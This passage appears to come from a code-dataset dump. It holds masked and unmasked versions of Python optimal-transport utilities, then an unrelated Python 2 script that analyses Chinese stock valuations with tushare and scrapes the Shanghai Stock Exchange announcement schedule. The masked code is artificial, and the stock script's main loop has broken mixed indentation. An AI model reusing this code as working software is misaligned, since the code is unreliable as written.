averaged_parameters\n\n\n<mask token>\n\n\ndef get_marginal_list(cfg, type_data='2block'):\n if type_data == '2block':\n marginal_data = g_data.marginal_data_blocks_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'circ_squa':\n marginal_data = g_data.marginal_data_circ_squ_3loop_ficnn(cfg)[:, :,\n :-1]\n elif type_data == 'mnist0-1':\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)\n elif type_data == '3digit':\n marginal_data = g_data.marginal_data_3digit_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'ellipse':\n marginal_data = g_data.marginal_data_ellipse_3loop_ficnn(cfg)[:, :, :-1\n ]\n elif type_data == 'line':\n marginal_data = g_data.marginal_data_line_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'usps_mnist':\n marginal_data = g_data.marginal_usps_3loop_ficnn_handle(cfg)[0][\n torch.randperm(5000), :, :-1]\n elif type_data == 'mnist_group':\n if cfg.N_TEST == 25:\n idx_digit = torch.zeros(25).long()\n for idx in range(5):\n idx_digit[idx * 5:(idx + 1) * 5] = 5000 * idx + torch.arange(5)\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)[\n idx_digit]\n else:\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)[torch\n .randperm(25000)]\n elif type_data == 'cifar':\n marginal_data = g_data.marginal_cifar_handle(cfg)\n elif type_data == 'gmm':\n marginal_data = g_data.marginal_data_gmm_3loop_ficnn(cfg)[:, :, :-1]\n return marginal_data.permute(2, 0, 1)\n",
"step-4": "from __future__ import print_function\nimport ot\nimport torch\nimport numpy as np\nfrom sklearn.neighbors import KernelDensity\nfrom torch.utils.data import Dataset\nimport jacinle.io as io\nimport optimal_transport_modules.pytorch_utils as PTU\nimport optimal_transport_modules.generate_data as g_data\nfrom optimal_transport_modules.record_mean_cov import select_mean_and_cov\n<mask token>\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(\n miu)\n return kde_analyzer\n\n\ndef second_moment_no_average(batch_dim):\n return batch_dim.pow(2).sum(dim=1)\n\n\ndef second_moment_single_dist(batch_dim):\n return batch_dim.pow(2).sum(dim=1).mean()\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.\n reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.reshape(-1)\n )\n return innner_product\n\n\ndef grad_of_function(input_samples, network):\n g_of_y = network(input_samples).sum()\n gradient = torch.autograd.grad(g_of_y, input_samples, create_graph=True)[0]\n return gradient\n\n\ndef two_loop_loss_in_W2(convex_f_list, grad_g_of_y, miu_i, dist_weight,\n idx_dist):\n n_dist = dist_weight.shape[0]\n f_grad_g_y = convex_f_list[idx_dist](grad_g_of_y).mean()\n for j in range(n_dist):\n f_grad_g_y -= dist_weight[j] * convex_f_list[j](grad_g_of_y).mean()\n inner_product = inprod_average(grad_g_of_y, miu_i)\n half_moment_grad_of_g = 0.5 * second_moment_single_dist(grad_g_of_y)\n loss_gi = (f_grad_g_y - inner_product + half_moment_grad_of_g\n ) * dist_weight[idx_dist]\n return loss_gi\n\n\n<mask token>\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M) ** 2, axis=2)\n return ot.emd2(a, b, M)\n\n\ndef free_support_barycenter(measures_locations, measures_weights, X_init, b\n =None, weights=None, numItermax=100, stopThr=1e-07, use_sinkhorn=False):\n g_sinkhorn_reg = 0.1\n iter_count = 0\n N = len(measures_locations)\n k = X_init.shape[0]\n d = X_init.shape[1]\n if b is None:\n b = np.ones((k,)) / k\n if weights is None:\n weights = np.ones((N,)) / N\n X = X_init\n log_dict = {}\n displacement_square_norm = stopThr + 1.0\n while displacement_square_norm > stopThr and iter_count < numItermax:\n T_sum = np.zeros((k, d))\n for measure_locations_i, measure_weights_i, weight_i in zip(\n measures_locations, measures_weights, weights.tolist()):\n M_i = ot.dist(X, measure_locations_i)\n if use_sinkhorn:\n T_i = ot.bregman.sinkhorn(b, measure_weights_i, M_i,\n g_sinkhorn_reg)\n else:\n T_i = ot.emd(b, measure_weights_i, M_i)\n T_sum = T_sum + weight_i * np.reshape(1.0 / b, (-1, 1)\n ) * np.matmul(T_i, measure_locations_i)\n displacement_square_norm = np.sum(np.square(T_sum - X))\n X = T_sum\n print('iteration %d, displacement_square_norm=%f\\n', iter_count,\n displacement_square_norm)\n iter_count += 1\n return X\n\n\n<mask 
token>\n\n\nclass ReshapeTransform:\n\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, data, target, transform=None):\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n if self.transform:\n data_idxed = self.transform(data_idxed)\n return [data_idxed, target_idxed]\n\n\n<mask token>\n\n\ndef get_gmm_param(trial, cond=-1):\n if cond > 0:\n MEAN, COV = select_mean_and_cov(trial, range_cond=cond)\n else:\n MEAN, COV = select_mean_and_cov(trial)\n INPUT_DIM = MEAN[0].shape[1]\n OUTPUT_DIM = INPUT_DIM\n NUM_DISTRIBUTION = len(MEAN)\n NUM_GMM_COMPONENT = []\n for i in range(NUM_DISTRIBUTION):\n NUM_GMM_COMPONENT.append(MEAN[i].shape[0])\n high_dim_flag = INPUT_DIM > 2\n return (MEAN, COV, INPUT_DIM, OUTPUT_DIM, NUM_DISTRIBUTION,\n NUM_GMM_COMPONENT, high_dim_flag)\n\n\n<mask token>\n\n\ndef average_nn(args, **kwargs):\n averaged_parameters = np.zeros([args.N_SAMPLES, args.INPUT_DIM])\n tmp_data = averaged_parameters\n n_samp_of_subset = int(args.N_SAMPLES / args.NUM_DISTRIBUTION)\n for i in range(args.NUM_DISTRIBUTION):\n model_param = io.load(args.get_nn(**kwargs) +\n f'/subset_{i + 1}_samples_{args.subset_samples}/trial_26/storing_models/nn_2layer_epoch200.pt'\n )\n assert args.N_SAMPLES == model_param['layer1.weight'].shape[0]\n tmp_data[:, :-1] = PTU.torch2numpy(model_param['layer1.weight'])\n tmp_data[:, -1] = PTU.torch2numpy(model_param['last_layer.weight'].\n squeeze())\n if i == args.NUM_DISTRIBUTION - 1:\n averaged_parameters[i * n_samp_of_subset:] = tmp_data[i *\n n_samp_of_subset:]\n else:\n averaged_parameters[i * n_samp_of_subset:(i + 1) * n_samp_of_subset\n ] = tmp_data[i * n_samp_of_subset:(i + 1) * n_samp_of_subset]\n return averaged_parameters\n\n\n<mask token>\n\n\ndef get_marginal_list(cfg, type_data='2block'):\n if type_data == '2block':\n marginal_data = g_data.marginal_data_blocks_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'circ_squa':\n marginal_data = g_data.marginal_data_circ_squ_3loop_ficnn(cfg)[:, :,\n :-1]\n elif type_data == 'mnist0-1':\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)\n elif type_data == '3digit':\n marginal_data = g_data.marginal_data_3digit_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'ellipse':\n marginal_data = g_data.marginal_data_ellipse_3loop_ficnn(cfg)[:, :, :-1\n ]\n elif type_data == 'line':\n marginal_data = g_data.marginal_data_line_3loop_ficnn(cfg)[:, :, :-1]\n elif type_data == 'usps_mnist':\n marginal_data = g_data.marginal_usps_3loop_ficnn_handle(cfg)[0][\n torch.randperm(5000), :, :-1]\n elif type_data == 'mnist_group':\n if cfg.N_TEST == 25:\n idx_digit = torch.zeros(25).long()\n for idx in range(5):\n idx_digit[idx * 5:(idx + 1) * 5] = 5000 * idx + torch.arange(5)\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)[\n idx_digit]\n else:\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(cfg)[torch\n .randperm(25000)]\n elif type_data == 'cifar':\n marginal_data = g_data.marginal_cifar_handle(cfg)\n elif type_data == 'gmm':\n marginal_data = g_data.marginal_data_gmm_3loop_ficnn(cfg)[:, :, :-1]\n return marginal_data.permute(2, 0, 1)\n",
"step-5": "from __future__ import print_function\nimport ot\nimport torch\nimport numpy as np\nfrom sklearn.neighbors import KernelDensity\nfrom torch.utils.data import Dataset\nimport jacinle.io as io\nimport optimal_transport_modules.pytorch_utils as PTU\nimport optimal_transport_modules.generate_data as g_data\nfrom optimal_transport_modules.record_mean_cov import select_mean_and_cov\n\n'''\nPyTorch type\n'''\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(\n kernel='gaussian', bandwidth=bandwidth).fit(miu)\n return kde_analyzer\n\n\ndef second_moment_no_average(batch_dim):\n return batch_dim.pow(2).sum(dim=1)\n\n\ndef second_moment_single_dist(batch_dim):\n return batch_dim.pow(2).sum(dim=1).mean()\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1),\n batch_dim_2.reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1),\n batch_dim_2.reshape(-1))\n return innner_product\n\n\ndef grad_of_function(input_samples, network):\n g_of_y = network(input_samples).sum()\n gradient = torch.autograd.grad(\n g_of_y, input_samples, create_graph=True)[0]\n return gradient\n\n\ndef two_loop_loss_in_W2(convex_f_list, grad_g_of_y, miu_i, dist_weight, idx_dist):\n n_dist = dist_weight.shape[0]\n\n #! The 2nd loss part useful for f/g parameters\n f_grad_g_y = convex_f_list[idx_dist](grad_g_of_y).mean()\n\n #! The 4th loss part useful for f/g parameters\n for j in range(n_dist):\n f_grad_g_y -= dist_weight[j] * convex_f_list[j](grad_g_of_y).mean()\n\n #! The 1st loss part useful for g parameters\n inner_product = inprod_average(grad_g_of_y, miu_i)\n\n #! 
The 3rd loss part useful for g parameters\n half_moment_grad_of_g = 0.5 * second_moment_single_dist(grad_g_of_y)\n\n loss_gi = (f_grad_g_y - inner_product +\n half_moment_grad_of_g) * dist_weight[idx_dist]\n return loss_gi\n\n\n'''\nlocalized POT library\n'''\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n # see here for details\n # https://pythonot.github.io/all.html#ot.emd\n # https://pythonot.github.io/all.html#ot.emd2\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M)**2, axis=2)\n return ot.emd2(a, b, M)\n\n\ndef free_support_barycenter(measures_locations, measures_weights, X_init, b=None, weights=None, numItermax=100, stopThr=1e-7, use_sinkhorn=False):\n g_sinkhorn_reg = 0.1\n iter_count = 0\n N = len(measures_locations)\n k = X_init.shape[0]\n d = X_init.shape[1]\n if b is None:\n b = np.ones((k,)) / k\n if weights is None:\n weights = np.ones((N,)) / N\n\n X = X_init\n\n log_dict = {}\n displacement_square_norm = stopThr + 1.\n while (displacement_square_norm > stopThr and iter_count < numItermax):\n T_sum = np.zeros((k, d))\n for (measure_locations_i, measure_weights_i, weight_i) in zip(measures_locations, measures_weights, weights.tolist()):\n M_i = ot.dist(X, measure_locations_i)\n if use_sinkhorn:\n T_i = ot.bregman.sinkhorn(\n b, measure_weights_i, M_i, g_sinkhorn_reg)\n else:\n T_i = ot.emd(b, measure_weights_i, M_i)\n T_sum = T_sum + weight_i * \\\n np.reshape(1. / b, (-1, 1)) * \\\n np.matmul(T_i, measure_locations_i)\n\n displacement_square_norm = np.sum(np.square(T_sum - X))\n\n X = T_sum\n print('iteration %d, displacement_square_norm=%f\\n',\n iter_count, displacement_square_norm)\n\n iter_count += 1\n\n return X\n\n\n'''\nMNIST utils\n'''\n\n\nclass ReshapeTransform:\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\n# def extract_three_number(total_data):\n# idx_train = (total_data.targets == 0) + (total_data.targets ==\n# 1) + (total_data.targets == 7)\n# total_data.targets = total_data.targets[idx_train]\n# total_data.data = total_data.data[idx_train]\n# return total_data\n\n\nclass CustomMnistDataset(Dataset):\n def __init__(self, data, target, transform=None):\n\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n # sample = {'data': data_idxed, 'target': target_idxed}\n\n if self.transform:\n data_idxed = self.transform(data_idxed)\n\n return [data_idxed, target_idxed]\n\n\n'''\nGaussian utils\n'''\n\n\ndef get_gmm_param(trial, cond=-1):\n if cond > 0:\n MEAN, COV = select_mean_and_cov(trial, range_cond=cond)\n else:\n MEAN, COV = select_mean_and_cov(trial)\n INPUT_DIM = MEAN[0].shape[1]\n OUTPUT_DIM = INPUT_DIM\n NUM_DISTRIBUTION = len(MEAN)\n NUM_GMM_COMPONENT = []\n for i in range(NUM_DISTRIBUTION):\n NUM_GMM_COMPONENT.append(MEAN[i].shape[0])\n high_dim_flag = INPUT_DIM > 2\n return MEAN, COV, INPUT_DIM, OUTPUT_DIM, NUM_DISTRIBUTION, NUM_GMM_COMPONENT, high_dim_flag\n\n\n'''\nAverage the 2 layer neural 
networks\n'''\n\n\ndef average_nn(args, **kwargs):\n averaged_parameters = np.zeros([args.N_SAMPLES, args.INPUT_DIM])\n tmp_data = averaged_parameters\n n_samp_of_subset = int(args.N_SAMPLES / args.NUM_DISTRIBUTION)\n for i in range(args.NUM_DISTRIBUTION):\n model_param = io.load(args.get_nn(**kwargs) +\n f\"/subset_{i+1}_samples_{args.subset_samples}/trial_26/storing_models/nn_2layer_epoch200.pt\")\n\n assert args.N_SAMPLES == model_param['layer1.weight'].shape[0]\n tmp_data[:, :-1] = PTU.torch2numpy(model_param['layer1.weight'])\n tmp_data[:, -\n 1] = PTU.torch2numpy(model_param['last_layer.weight'].squeeze())\n if i == args.NUM_DISTRIBUTION - 1:\n averaged_parameters[(i * n_samp_of_subset)\n :] = tmp_data[(i * n_samp_of_subset):]\n else:\n averaged_parameters[i * n_samp_of_subset:\n (i + 1) * n_samp_of_subset] = tmp_data[i * n_samp_of_subset:\n (i + 1) * n_samp_of_subset]\n\n return averaged_parameters\n\n\n'''\nget marginal data handle\n'''\n\n\ndef get_marginal_list(cfg, type_data='2block'):\n if type_data == '2block':\n marginal_data = g_data.marginal_data_blocks_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'circ_squa':\n marginal_data = g_data.marginal_data_circ_squ_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'mnist0-1':\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(\n cfg)\n elif type_data == '3digit':\n marginal_data = g_data.marginal_data_3digit_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'ellipse':\n marginal_data = g_data.marginal_data_ellipse_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'line':\n marginal_data = g_data.marginal_data_line_3loop_ficnn(\n cfg)[:, :, :-1]\n elif type_data == 'usps_mnist':\n marginal_data = g_data.marginal_usps_3loop_ficnn_handle(\n cfg)[0][torch.randperm(5000), :, :-1]\n elif type_data == 'mnist_group':\n if cfg.N_TEST == 25:\n idx_digit = torch.zeros(25).long()\n for idx in range(5):\n idx_digit[idx * 5:(idx + 1) * 5] = 5000 * idx + torch.arange(5)\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(\n cfg)[idx_digit]\n else:\n marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(\n cfg)[torch.randperm(25000)]\n elif type_data == 'cifar':\n marginal_data = g_data.marginal_cifar_handle(cfg)\n elif type_data == 'gmm':\n marginal_data = g_data.marginal_data_gmm_3loop_ficnn(\n cfg)[:, :, :-1]\n return marginal_data.permute(2, 0, 1)\n",
"step-ids": [
12,
13,
17,
21,
22
]
}
|
[
12,
13,
17,
21,
22
] |
# -*- coding:utf-8 -*-
import tushare as ts
import numpy as np
import pandas as pd
import datetime
import chardet
import urllib
import urllib2
import re
from bs4 import BeautifulSoup
import time
from pandas import Series,DataFrame
def get_relation(stock1,stock2):
hist_data = ts.get_hist_data(stock1,start='2018-05-01')
if hist_data is None:
return 0
hist_data.sort_values(by = "date",ascending = True,inplace = True)
hist_data_second = ts.get_hist_data(stock2,start='2018-05-01')
if hist_data_second is None:
return 0
hist_data_second.sort_values(by = "date",ascending = True,inplace = True)
result = pd.concat([hist_data,hist_data_second],axis = 1)
result = result['close']
result = result.dropna(how = 'any')
#result.to_excel('result.xlsx')
corr_result= result.corr()
result=np.array(corr_result.iloc[1:3,0:1])
return result[0][0]
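# Illustrative usage sketch (ticker codes are placeholders): returns the Pearson
# correlation of the two stocks' daily closes since 2018-05-01, or 0 when either
# code has no history on tushare.
#   corr = get_relation('600000', '000001')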
year = datetime.datetime.now().strftime('%Y')
month = datetime.datetime.now().strftime('%m')
day = datetime.datetime.now().strftime('%d')
second = datetime.datetime.now().strftime('%s')
season = (int(month) - 1) / 3 + 1  # current quarter (1-4); integer division under Python 2
basic = ts.get_stock_basics()
basic.to_excel( year+month+day+second + '_basics.xlsx')
grouped_pe = basic['pe'].groupby(basic['industry'])
grouped_pe.mean().to_excel( year+month+day+second + '_grouped_pe.xlsx')
grouped_pb = basic['pb'].groupby(basic['industry'])
#print grouped.mean()
grouped_pb.mean().to_excel( year+month+day+second + '_grouped_pb.xlsx')
#np_industry = np.array(grouped_pb.mean().index)
grouped_industry=pd.concat([grouped_pe.mean(),grouped_pb.mean()],axis =1 ,join = 'inner')
grouped_industry.to_excel( year+month+day+second + '_grouped_industry.xlsx')
np_industry = np.array(grouped_pb.mean().index)
#for industry in np_industry:
# current_industy = basic[basic['industry'].isin([str(industry)])]
# current_industy.to_excel(str(industry)+ '.xlsx')
yj_current_season=ts.forecast_data(int(year),season)
yj_last_season=ts.forecast_data(int(year),season-1)
yj_last_season_index=yj_last_season.set_index('code')
yj_curren_seaon_index=yj_current_season.set_index('code')
yj_index=pd.concat([yj_curren_seaon_index,yj_last_season_index],axis =0 ,join = 'outer')
#yj_index.to_excel('index_yeji.xlsx')
result = pd.concat([yj_index,basic],axis =1 ,join = 'inner')
#result_select = result[result['type'].isin([u'\u9884\u5347',u'\u9884\u589e'])]
result_select = result[result['type'].isin([u'\u9884\u589e'])]
result_select.sort_values(by = "report_date",ascending = False,inplace = True)
result_select = result_select[result_select['report_date'].isin([np.array(result_select['report_date'])[0]])]
for code in np.array(result_select.index):
    result_select.ix[str(code),'mean-pe'] = grouped_pe.mean()[result_select.ix[str(code),'industry']]
    hist_data = ts.get_hist_data(str(code),start='2018-05-01')
    if hist_data is not None:
        hist_data.sort_values(by = "date",ascending = False,inplace = True)
        hist_data = hist_data.iloc[0:5,:]
        #five_day_everage = hist_data['close'].mean()
        #hist_data.to_excel( year+month+day+second+str(code) + 'history.xlsx')
        result_select.ix[str(code),'five-day-mean'] = hist_data['close'].mean()
        close_price = np.array(hist_data['close'])
        if close_price.size > 0:
            result_select.ix[str(code),'last_day_price'] = np.array(hist_data['close'])[0]
            result_select.ix[str(code),'increase-rate'] = \
                (np.array(hist_data['close'])[0] - hist_data['close'].mean())/hist_data['close'].mean()
            result_select.ix[str(code),'touzhijiazhi'] = \
                (result_select.ix[str(code),'totalAssets']*10000)/(result_select.ix[str(code),'totals']*10000*10000)
            result_select.ix[str(code),'price-values'] = \
                result_select.ix[str(code),'touzhijiazhi'] /result_select.ix[str(code),'last_day_price']
            if result_select.ix[str(code),'pe'] == 0:
                result_select.ix[str(code),'pe'] = result_select.ix[str(code),'mean-pe']
            result_select.ix[str(code),'pray-values'] = \
                result_select.ix[str(code),'price-values'] * result_select.ix[str(code),'npr']/100.0 \
                *result_select.ix[str(code),'mean-pe'] /result_select.ix[str(code),'pe'] \
                *hist_data['close'].mean()/result_select.ix[str(code),'last_day_price']
result_select.to_excel( year+month+day+second + '_yeji.xlsx')
i = datetime.datetime.now()
#print ("the current date is %s" %i)
time_string = "%s-%s-%s"%(i.year,i.month,i.day)
print time_string
url ='http://query.sse.com.cn/infodisplay/queryBltnBookInfo.do?jsonCallBack=jsonpCallback55433&isNew=1&publishYear=2018'
#url ='https://query.sse.com.cn/infodisplay/'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
'Host':'query.sse.com.cn',
'Referer':'http://www.sse.com.cn/disclosure/listedinfo/periodic/',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN',
'Connection': 'keep-alive'
}
#values = {'inputCode':'000063'}
#pos_data = urllib.urlencode(values)
def compare_time(time1,time2):
s_time = time.mktime(time.strptime(time1,'%Y-%m-%d'))
e_time = time.mktime(time.strptime(time2,'%Y-%m-%d'))
return int(s_time) - int(e_time)
def my_save(filename,contents):
fh=open(filename,'w')
fh.write(contents)
fh.close()
request = urllib2.Request(url,headers = headers)
page = urllib2.urlopen(request)
#page.encoding = 'utf-8'
soup = BeautifulSoup(page,"lxml")
html = soup.select('p')
string1 = str(html[0])
string2 = string1.split('ROWNUM_')
df=pd.DataFrame(columns=['Name','code','type','publishDate0','actualDate'])
for string in string2:
name= re.findall(r'companyAbbr":"(.+?)","',string)
code= re.findall(r'companyCode":"(.+?)","',string)
report_type= re.findall(r'bulletinType":"(.+?)","',string)
date = re.findall(r'publishDate0":"(.+?)","',string)
actual = re.findall(r'actualDate":"(.+?)","',string)
if len(actual) == 0 and len(date)!=0 and compare_time(str(date[0]),time_string) > 0:
df=df.append(pd.DataFrame({'Name':name,'code':code,'type':report_type,'publishDate0':date}),ignore_index=True)
df.sort_values(by = "publishDate0",ascending = True,inplace = True)
#df= df.iloc[0:16,:]
df.to_excel('ready_to_report.xlsx')
np_ready_report = np.unique(np.array(df['code']))
np_increase_report = np.array(result_select.index)
forcast=pd.DataFrame()
#forcast=pd.DataFrame(columns=['increase code','forcast code','relation'])
index = 0
for code1 in np_increase_report:
for code2 in np_ready_report:
if cmp(basic.ix[str(code2),'industry'],basic.ix[str(code1),'industry']) == 0:
relation = get_relation(str(code1),str(code2))
forcast.ix[str(index),'increase code'] = code1
forcast.ix[str(index),'forcast code'] = code2
forcast.ix[str(index),'relation'] = relation
forcast.ix[str(index),'publishDate0'] = np.array(df[df['code'].isin([code2])]['publishDate0'])[0]
forcast.ix[str(index),'forcast industry'] = basic.ix[str(code2),'industry']
forcast.ix[str(index),'increase industry'] = basic.ix[str(code1),'industry']
index = index +1
forcast.to_excel('forcast.xlsx')
|
normal
|
{
"blob_id": "00f2aafe1a0c66d0414d189b9fa3bbc2da9fd727",
"index": 2066,
"step-1": "# -*- coding:utf-8 -*\nimport tushare as ts\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport chardet\nimport urllib\nimport urllib2\nimport re\nfrom bs4 import BeautifulSoup\nimport time\nfrom pandas import Series,DataFrame\n\ndef get_relation(stock1,stock2):\n hist_data = ts.get_hist_data(stock1,start='2018-05-01')\n if hist_data is None:\n return 0\n hist_data.sort_values(by = \"date\",ascending = True,inplace = True)\n hist_data_second = ts.get_hist_data(stock2,start='2018-05-01')\n if hist_data_second is None:\n return 0\n hist_data_second.sort_values(by = \"date\",ascending = True,inplace = True)\n result = pd.concat([hist_data,hist_data_second],axis = 1)\n result = result['close']\n result = result.dropna(how = 'any')\n #result.to_excel('result.xlsx')\n corr_result= result.corr()\n result=np.array(corr_result.iloc[1:3,0:1])\n return result[0][0]\n\nyear = datetime.datetime.now().strftime('%Y')\nmonth = datetime.datetime.now().strftime('%m')\nday = datetime.datetime.now().strftime('%d')\nsecond = datetime.datetime.now().strftime('%s')\nseason = int(month) /3 +1\nbasic = ts.get_stock_basics()\nbasic.to_excel( year+month+day+second + '_basics.xlsx')\n\ngrouped_pe = basic['pe'].groupby(basic['industry'])\n\ngrouped_pe.mean().to_excel( year+month+day+second + '_grouped_pe.xlsx')\n\ngrouped_pb = basic['pb'].groupby(basic['industry'])\n#print grouped.mean()\ngrouped_pb.mean().to_excel( year+month+day+second + '_grouped_pb.xlsx')\n\n#np_industry = np.array(grouped_pb.mean().index)\ngrouped_industry=pd.concat([grouped_pe.mean(),grouped_pb.mean()],axis =1 ,join = 'inner')\ngrouped_industry.to_excel( year+month+day+second + '_grouped_industry.xlsx')\nnp_industry = np.array(grouped_pb.mean().index)\n#for industry in np_industry:\n# current_industy = basic[basic['industry'].isin([str(industry)])]\n# current_industy.to_excel(str(industry)+ '.xlsx')\n\nyj_current_season=ts.forecast_data(int(year),season)\nyj_last_season=ts.forecast_data(int(year),season-1)\n\nyj_last_season_index=yj_last_season.set_index('code')\nyj_curren_seaon_index=yj_current_season.set_index('code')\nyj_index=pd.concat([yj_curren_seaon_index,yj_last_season_index],axis =0 ,join = 'outer')\n#yj_index.to_excel('index_yeji.xlsx')\nresult = pd.concat([yj_index,basic],axis =1 ,join = 'inner')\n#result_select = result[result['type'].isin([u'\\u9884\\u5347',u'\\u9884\\u589e'])]\nresult_select = result[result['type'].isin([u'\\u9884\\u589e'])]\nresult_select.sort_values(by = \"report_date\",ascending = False,inplace = True)\nresult_select = result_select[result_select['report_date'].isin([np.array(result_select['report_date'])[0]])]\n\nfor code in np.array(result_select.index):\n\tresult_select.ix[str(code),'mean-pe'] = grouped_pe.mean()[result_select.ix[str(code),'industry']] \n\thist_data = ts.get_hist_data(str(code),start='2018-05-01')\n\tif hist_data is not None:\n \t\thist_data.sort_values(by = \"date\",ascending = False,inplace = True)\n \t\thist_data = hist_data.iloc[0:5,:]\n \t\t#five_day_everage = hist_data['close'].mean()\n \t\t#hist_data.to_excel( year+month+day+second+str(code) + 'history.xlsx')\n\t\t\tresult_select.ix[str(code),'five-day-mean'] = hist_data['close'].mean()\n close_price = np.array(hist_data['close'])\n if close_price.size > 0:\n \t\t\tresult_select.ix[str(code),'last_day_price'] = np.array(hist_data['close'])[0]\n result_select.ix[str(code),'increase-rate'] = \\\n (np.array(hist_data['close'])[0] - hist_data['close'].mean())/hist_data['close'].mean()\n \n 
result_select.ix[str(code),'touzhijiazhi'] = \\\n (result_select.ix[str(code),'totalAssets']*10000)/(result_select.ix[str(code),'totals']*10000*10000) \n\n result_select.ix[str(code),'price-values'] = \\\n result_select.ix[str(code),'touzhijiazhi'] /result_select.ix[str(code),'last_day_price']\n if result_select.ix[str(code),'pe'] == 0:\n result_select.ix[str(code),'pe'] = result_select.ix[str(code),'mean-pe']\n result_select.ix[str(code),'pray-values'] = \\\n result_select.ix[str(code),'price-values'] * result_select.ix[str(code),'npr']/100.0 \\\n *result_select.ix[str(code),'mean-pe'] /result_select.ix[str(code),'pe'] \\\n *hist_data['close'].mean()/result_select.ix[str(code),'last_day_price']\n\n \nresult_select.to_excel( year+month+day+second + '_yeji.xlsx')\n\ni = datetime.datetime.now()\n#print (\"当前的日期是%s\" %i)\ntime_string = \"%s-%s-%s\"%(i.year,i.month,i.day)\nprint time_string\nurl ='http://query.sse.com.cn/infodisplay/queryBltnBookInfo.do?jsonCallBack=jsonpCallback55433&isNew=1&publishYear=2018'\n#url ='https://query.sse.com.cn/infodisplay/'\n\nheaders = {\n'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n'Host':'query.sse.com.cn',\n'Referer':'http://www.sse.com.cn/disclosure/listedinfo/periodic/',\n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n'Accept-Encoding': 'gzip, deflate',\n'Accept-Language': 'zh-CN',\n'Connection': 'keep-alive'\n}\n#values = {'inputCode':'000063'}\n#pos_data = urllib.urlencode(values)\ndef compare_time(time1,time2):\n s_time = time.mktime(time.strptime(time1,'%Y-%m-%d'))\n e_time = time.mktime(time.strptime(time2,'%Y-%m-%d'))\n return int(s_time) - int(e_time)\n\ndef my_save(filename,contents):\n fh=open(filename,'w')\n fh.write(contents)\n fh.close()\n\n\nrequest = urllib2.Request(url,headers = headers)\npage = urllib2.urlopen(request)\n#page.encoding = 'utf-8'\nsoup = BeautifulSoup(page,\"lxml\")\nhtml = soup.select('p')\nstring1 